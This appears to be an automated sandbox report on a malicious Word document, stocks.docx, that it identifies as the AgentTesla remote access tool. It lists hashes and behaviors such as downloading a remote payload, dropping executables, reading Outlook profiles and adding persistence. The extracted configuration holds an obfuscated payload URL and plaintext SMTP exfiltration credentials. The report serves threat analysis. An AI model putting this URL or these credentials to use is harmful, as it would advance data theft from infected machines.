General
-
Target
stocks.docx
-
Size
10KB
-
Sample
230418-hmaqksbg7w
-
MD5
0f341a25ed45ee0c5a13c99ea7194081
-
SHA1
91f808e6a287071eaf9c4634a3c24cef4f9e9e59
-
SHA256
f42dbc7d64913299d020364ed9c3278e9fab9a140688754bc96b869c03ad61af
-
SHA512
2609da36fcb55ba3f87a297234648546d87627310c9b0ae14971be4b604018a0aa5eb8ecc128cce08a0cf0447ffa7e05edd901d2ffe1dcba702bfdf5a0082490
-
SSDEEP
192:ScIMmtPGT7G/bIwXOVOOE8O5SEzBC4vNq6sM63gG:SPXuT+xXOVOS8hlqHL
Static task
static1
Behavioral task
behavioral1
Sample
stocks.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
stocks.docx
Resource
win10v2004-20230220-en
Malware Config
Extracted
http://%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23ZZZZ99999999ZZZZZZ99999999ZZZZZZZ55555Z5Z5Z55Z5Z5Z5ZZZZZZZ0LLLLLLLOOOOO0000000000LLLLL00000000000OOOLLLLLLL@3235043190/q/%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23.doc
Extracted
agenttesla
Protocol: smtp- Host:
us2.smtp.mailhostbox.com - Port:
587 - Username:
002@frem-tr.com - Password:
jCXzqcP1 daniel 3116 - Email To:
002@frem-tr.com
Targets
-
-
Target
stocks.docx
-
Size
10KB
-
MD5
0f341a25ed45ee0c5a13c99ea7194081
-
SHA1
91f808e6a287071eaf9c4634a3c24cef4f9e9e59
-
SHA256
f42dbc7d64913299d020364ed9c3278e9fab9a140688754bc96b869c03ad61af
-
SHA512
2609da36fcb55ba3f87a297234648546d87627310c9b0ae14971be4b604018a0aa5eb8ecc128cce08a0cf0447ffa7e05edd901d2ffe1dcba702bfdf5a0082490
-
SSDEEP
192:ScIMmtPGT7G/bIwXOVOOE8O5SEzBC4vNq6sM63gG:SPXuT+xXOVOS8hlqHL
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-
Adds Run key to start application
-
Drops file in System32 directory
-
Suspicious use of SetThreadContext
-